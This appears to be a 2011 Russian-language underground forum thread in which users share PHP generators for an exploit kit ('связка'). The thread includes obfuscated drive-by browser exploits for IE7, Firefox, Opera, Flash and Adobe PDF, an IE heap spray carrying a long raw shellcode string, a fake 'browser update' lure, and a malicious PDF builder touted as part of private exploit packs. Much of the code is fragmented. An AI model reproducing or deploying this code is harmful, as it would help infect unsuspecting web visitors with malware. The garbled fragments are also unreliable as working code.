Просмотр полной версии : Актуальные сплойты для связок
GibridMelody
16.10.2011, 12:43
Предлогаю выкладывать сдесь актуальные сплойты которые можно воткнуть в связку.
Начну пожалуй:
IE 7
PHP:
functionmem_cor() {$memcor_name=get_random_stri ng_array(rand(8,15),'15');$content=' var '.$memc or_name[0] .' = unescape('._shellcode(mem_cor).'); var '.$memcor_name[1] .' = new Array(); var '.$memcor_name[2] .' = 0x100000-('.$memcor_name[0] .'.length*2+0x01020); var '.$memcor_name[4] .' = unescape("%u0C0C%u0C0C"); while('.$memcor_name[4] .'.length
Loremipsumdoloregkuw
Loremipsumdoloregkuwiert
Loremikdkw
var '.$font_name[0] .' = '._shellcode(Font_FireFox) .';
var '.$font_name[1] .' = unescape('.$font_name[0] .');
var '.$font_name[2] .' = unescape("%u0c0c%u0c0c");
while ('.$font_name[2] .'.length 0)
while (i
';
return$content;
}
FireFox PDF
PHP:
[PHP]functionpdf_ff()
{
global$pdf;
$pdf_ff_name=get_random_string_array(rand(3,19),'5 ');
$content='
function '.$pdf_ff_name[0] .'()
{
var '.$pdf_ff_name[1] .' = false;
try
{if( navigator.plugins && navigator.mimeTypes.length)
{for( var '.$pdf_ff_name[2] .' = 0; '.$pdf_ff_name[2] .' \');
}
else return false;
}
'.$pdf_ff_name[0] .'();
';
return$content;
}
Opera PDF
PHP:
[PHP]functionpdf_op()
{
global$pdf;
$pdf_op_name=get_random_string_array(rand(3,19),'5 ');
$content='
function '.$pdf_op_name[0] .'()
{
var '.$pdf_op_name[1] .' = false;
try
{
if( navigator.plugins && navigator.mimeTypes.length)
{for( var '.$pdf_op_name[2] .' = 0; '.$pdf_op_name[2] .' \');
}
else return false;
}
'.$pdf_op_name[0] .'();
';
return$content;
}
GibridMelody
16.10.2011, 18:01
IE PDF
PHP:
[PHP]functionpdf_ie()
{
global$pdf,$case_spl;
$pdf_ie_name=get_random_string_array(rand(7,19),'8 ');
//if ((ver = "8.0.0") && (ver ");
var ver = jdf1.GetVersions();
ver = ver.split(",");
ver = ver[1].split("=");
ver = ver[1];
if ((ver \');
}
else
{
setTimeout("dorefresh();",1000);
}
';
return$O000000OO;
}
functionpdf_2()
{
global$pdf;
$O000000OO='
';
return$O000000OO;
}
PDF ALL
[PHP]
PHP:
[COLOR="#0000BB"]functionpdf_all()
{
global$pdf;
$O000000OO='document.write("");';
return$O000000OO;
}
//================================================== =======// PDF //================================================== =======//
functionactivex_pack()
{
global$load,$url;
$O000000OO='
sysWIN.url = "'.$load.'?spl=ActiveX_pack"
sysWIN.fontsize = 10
sysWIN.barcolor = 00FF00
sysWIN.start = "start"
';
return$O000000OO;
}
functionjava_exec()
{
global$load;
$url=$load."?spl=javar";
$url=base64_encode($url);
$O000000OO='
';
return$O000000OO;
}
functionnext_spl($refr)
{
global$O0000000O,$OOOOOO000,$OOOOO0000,$OOOO00000;
$O0000000O++;
$O000000OO='
function dorefresh(){
window.location="?spl='.$O0000000O.'&br='.$OOOOOO000.'&vers='.$OOOOO0000[2].'&s='.$OOOO00000.'";
}
setTimeout("dorefresh();",'.$refr.'000);
';
return$O000000OO;
}
functionflash10()
{
global$url;
$content='
function flash_version(){
var d, n = navigator, m, f = \'Sho ckwave Flash\';
if((m = n.mimeTypes) && (m = m["application/x-shockwave-flash"]) && m.enabledPlugin && (n = n.plugins) && n[f]) {d = n[f].description}
else if (window.ActiveXObject) { try { d = (new ActiveXObject((f+\'.\'+f).replace(/ /g,\'\'))).GetVariable(\'$version\');} catch (e) {}}
return d ? d.replace(/\D+/,\'\').split(/\D+/) : [0,0];
}
function start_flash(){
document.write(\'\');
var memory;
var nop = unescape("%u0c0c%u0c0c");
var SC=unescape('._shellcode("flash").');
while(nop.length \');
}
}
if (flash_version()[0] == "9")
{
if (flash_version()[2]
function fakes()
{
if (confirm("Warning! Your browser is old. \n please ins tall the update")) {
parent.location="soc.php";
}
else {
}
}
fakes();
';
if ($soc_pack=="0"){$xxx='';}
else$xxx=$O000000OO;
return$xxx;
}
functionnewie()
{
$O000000OO=[COLOR="#DD0000"]'
function LoaD(){ document.getElementsByTagName(\ 'STYLE\')[0].outerHTML++; }
function HeapSpray(){
var unspacese = unescape;
var shellcode = unspacese("%uf527%uf940%u4991%uf59b%uf591%uf593%u3743%u4793%u fd96%u97d6%u4b97%u9046%u4643%u4296%u4f98%u4241%u92 9f%u4793%u4f41%u47f8%uf89b%u9f4b%u4ff8%u424f%u4099 %u484e%u924b%u91fc%uf897%ufc90%u4a4e%ufd43%u9137%u fd9f%uf847%u48fc%u4242%uf599%u4bfd%ud69b%u9b42%u37 9b%u4092%u4ed6%u374b%u37f5%ufcd6%u4f41%u9291%u3749 %u2797%u92d6%u2792%u41f8%u9741%u4048%u4143%u9f4b%u 4a9b%u4296%u9b48%u9249%u4648%u9b4a%ufc96%u2ff5%u9b 99%u4791%ufc91%ud6f9%u3791%uf527%u9b99%u374f%u969b %u9b4b%u40f8%u9b43%u9149%u4a92%u4891%ud62f%u41d6%u 4f98%u4f42%ufc9f%u9090%u4a37%u9290%u4ad6%u9747%ufd 49%u914b%u924e%u4f90%u4848%u43fc%u4040%u9941%u2743 %u98f8%u3f47%u4892%u964a%ud637%u4a91%u49fc%u932f%u f527%u4646%u4990%u9196%ufc47%ud690%u9298%uf5f8%u91 f9%u47f9%u4637%u99fc%u404f%u4048%u9246%u9947%u4e4e %u4a27%u9b96%u4bfc%u3f96%u49f8%u2f4f%u9b4f%ud693%u f84a%u90d6%u4391%ufc3f%u4342%u962f%u404f%u974a%ud6 9f%uf8f9%u4240%u9798%ufc93%u4947%ufd4b%u4240%u4b97 %u4f37%u4e96%u4f96%u962f%u3741%u37f5%u4f42%uf84e%u 9190%ufc90%u4e99%ufd4f%ufd9f%u4a47%u4e3f%ufc9b%u2f 4b%u9393%ud63f%u4297%ufd93%u3f40%u4747%u9897%ufd46 %u9396%u4392%u374b%u4743%ufc37%uf543%uf890%u4af9%u 973f%u92f5%u27f9%u9891%u2fd6%ufc46%u4347%u4f91%u40 f8%u4b96%u93f8%u9696%u472f%u9646%u3ff5%u9646%u9f43 %u4296%u9340%u429b%u91fd%u464a%u49f9%u9b37%u4ad6%u 47f9%u9f48%u37fd%u4391%u494f%u914b%ufc4a%u929b%u27 9f%uf52f%u4699%u96f5%u9f43%u4e27%u9927%u4a93%u922f %u4648%u4e9f%u4793%u4afc%uf837%ufc40%ufd4e%u96fd%u 4a98%ufc3f%ufd4f%u4ffc%u3f4e%u92fc%u409b%u9140%u46 40%u4697%u4b47%u4f90%u9f49%u2f41%u4190%ud69b%u37fc %u274f%u2f4f%u4f9f%u2f48%u4e40%u3f4a%u4f93%ufd97%u 9b4b%u2748%u9999%u4f9f%u9292%u379b%u4f90%u93fc%u4f 4b%u2793%u3793%u2f43%uf897%u414e%uf927%u4297%uf948 %uf54b%u4afc%u9748%u2f2f%u9f46%uf94b%u3799%u9946%u 4047%u494b%u9ff5%uf996%u492f%u3f93%u2ffc%u489f%u98 43%u3f4e%u9848%ufd41%uf94b%u42fd%ud642%u372f%u42f9 %ufd4e%u9f41%u4047%u4b2f%u964a%u4f2f%u97fc%u424b%u 2740%u9bd6%u9341%u494f%ud6d6%u9147%u49fc%u4b4a%u92 f5%uf54b%u4e4f%u3f4f%ufd99%u9bf8%u2797%u2f93%u9197 %u2f42%u3f2f%u2742%u9b4e%u42f5%u4143%uf896%u484f%u d647%u272f%u96fc%u9349%u4697%uf597%uf83f%u2f97%u91 98%u4193%u429f%u4b48%u4349%u914e%u2fd6%u9b2f%u4f98 %u9b93%u4827%u4698%u4a9f%uf54b%u4f47%u9f9b%u924f%u 9143%u9642%u91f8%uf549%u9992%u9327%uf8f5%u4691%u91 fc%u9237%u46fd%u3f92%ud646%u3f49%u37f9%u4999%u9692 %u4a9f%u902f%u929b%u4698%u4f91%u9393%u4342%u4837%u 3348%ub1c9%uba34%ubfe7%ub4f5%uc4d9%u74d9%uf424%u31 5e%u1056%uc683%u0304%u0c56%u4a05%u7074%u479d%u8688 %u40e1%u79fe%u9119%uf361%ua0fc%u67b3%u9075%ue303%u 19db%ua1ef%uaacf%u6d9d%u1be0%u482b%u9ccf%u549d%u5f 83%u28bf%ub3d9%u101f%uc612%u555e%u294e%u0e32%u9805 %u3ba3%u215b%uebc5%u19d0%u8ebd%ued26%u9077%u5e76%u da03%ud46e%ufb4b%u398f%uc788%u36c6%ub37b%u9ed9%u3c b5%udee8%u031a%ud2c5%u4363%u0ce1%ubf16%ub012%u0421 %u6e69%u99a7%ue5c9%u7a1f%u2ae8%u09f9%u87e6%u568d%u 16ea%ued41%u9216%u2264%ue09f%ue642%ub3c4%ubfeb%u12 a0%udf13%uca0c%uabb1%u1fbe%uf1c3%uded4%u8c41%ue191 %u8f59%u89b1%u0468%ucd5e%ucf74%u311b%uda97%uda51%u 8f0e%u87d8%u65b0%ube1e%u8c32%u45de%ue52a%u02db%u15 ec%u1b91%u1999%u1b06%u7988%u8fc9%u5050%u286c%uacf2");
var bigblock = unspacese( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
var headersize = 20 + shellcode.length;
while (bigblock.length
GibridMelody
19.10.2011, 18:26
Легендарный PDF libbtiff на данный момент входит во все приват связки эксплойтов!!
PHP:
\r\n\r\n\r\n\r\n\r\n1.65\r\n1\r\n1\r\n\r\n\r\n*\r\ n\r\npdf\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r \n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n".$Exploit."\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r \n\r\n\r\n\r\n\r\n\r\n";
return$XML;
}
/////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////
functionGenerate_PDF()
{
$Newline="\r\n";
$Ascii_85= newASCII85();
$XML=gzcompress(Generate_XML());
$XML=$Ascii_85->encode($XML);
$PDF="%PDF-1.6".$Newline;
$PDF=$PDF."1 0 obj".$Newline;
// $PDF = $PDF.">".$Newline; //Experimental
$PDF=$PDF.">".$Newline;
$PDF=$PDF."stream".$Newline;
$PDF=$PDF.$XML.$Newline;
$PDF=$PDF."endstream".$Newline;
$PDF=$PDF."endobj".$Newline;
$PDF=$PDF."2 0 obj".$Newline;
$PDF=$PDF.">".$Newline;
$PDF=$PDF."endobj".$Newline;
$PDF=$PDF."3 0 obj".$Newline;
$PDF=$PDF.">".$Newline;
$PDF=$PDF."endobj".$Newline;
$PDF=$PDF."4 0 obj".$Newline;
$PDF=$PDF.">/TP 1>>/P 5 0 R/FT /Btn/TU (ImageField1)/Ff 65536/Parent 3 0 R/F 4/DA (/CourierStd 10 Tf 0 g)/Subtype /Widget/Type /Annot/T (ImageField1[0])/Rect [107.385 705.147 188.385 709.087]>>".$Newline;
$PDF=$PDF."endobj".$Newline;
$PDF=$PDF."5 0 obj".$Newline;
$PDF=$PDF.">/Parent 6 0 R/Type /Page/PieceInfo null>>".$Newline;
$PDF=$PDF."endobj".$Newline;
$PDF=$PDF."6 0 obj".$Newline;
$PDF=$PDF.">".$Newline;
$PDF=$PDF."endobj".$Newline;
$PDF=$PDF."7 0 obj".$Newline;
$PDF=$PDF.">/Lang (en-us)/AcroForm 8 0 R/Type /Catalog>>".$Newline;
$PDF=$PDF."endobj".$Newline;
$PDF=$PDF."8 0 obj".$Newline;
$PDF=$PDF.">".$Newline;
$PDF=$PDF."endobj xref".$Newline;
$PDF=$PDF."trailer".$Newline;
$PDF=$PDF.">".$Newline;
$PDF=$PDF."startxref".$Newline;
$PDF=$PDF."14765".$Newline;
$PDF=$PDF."%%EOF";
return$PDF;
}
$Finished=Generate_PDF();
header("Accept-Ranges: bytes\r\n");
header("Content-Length: ".strlen($Finished)."\r\n");
header("Content-Disposition: inline; filename=".rand(1,9999).".pdf");
header("\r\n");
header("Content-Type: application/pdf\r\n\r\n");
echo$Finished;
?>
эксплойт под IE 7 у меня не пахает
а как устроены pdf экспы... надо еще подсоединить pdf с включеным в него шелкодом?
и как я понял он бьет adobe acrobat который поддерживает работу с браузерами. и с какой версии это работает? не во всех же версиях есть поддержка браузера.
и кстати я плохо понимаю почему юзеры не обновляют свое ПО. ведь оно обновляется автоматически... что они все нажимают отмена когда начинается обновление
даже пиратская винда сама обновляется.... включая IE который тоже обновляется, но почемуто до сих пор остаются старые версии
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot